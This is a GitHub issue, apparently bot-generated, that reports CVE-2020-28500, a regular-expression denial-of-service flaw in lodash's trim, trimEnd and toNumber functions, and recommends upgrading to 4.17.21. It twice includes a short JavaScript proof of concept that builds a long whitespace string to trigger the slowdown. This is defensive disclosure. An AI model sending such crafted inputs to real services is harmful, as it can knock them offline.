You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2)
mend-bolt-for-githubbot
changed the title
CVE-2020-28500 (Medium) detected in nodev15.5.0
CVE-2020-28500 (Medium) detected in nodev15.11.0, io.jsv15.0.0
Mar 8, 2021
mend-bolt-for-githubbot
changed the title
CVE-2020-28500 (Medium) detected in nodev15.11.0, io.jsv15.0.0
CVE-2020-28500 (Medium) detected in nodev15.11.0
Mar 8, 2021
mend-bolt-for-githubbot
changed the title
CVE-2020-28500 (Medium) detected in nodev15.11.0
CVE-2020-28500 (Medium) detected in nodev15.11.0, io.jsv15.0.0
Mar 8, 2021
CVE-2020-28500 - Medium Severity Vulnerability
Vulnerable Libraries - nodev15.11.0, io.jsv15.0.0
Vulnerability Details
All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2)
Publish Date: 2021-02-15
URL: CVE-2020-28500
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: lodash/lodash@02906b8
Release Date: 2021-02-15
Fix Resolution: lodash - 4.17.21
The text was updated successfully, but these errors were encountered: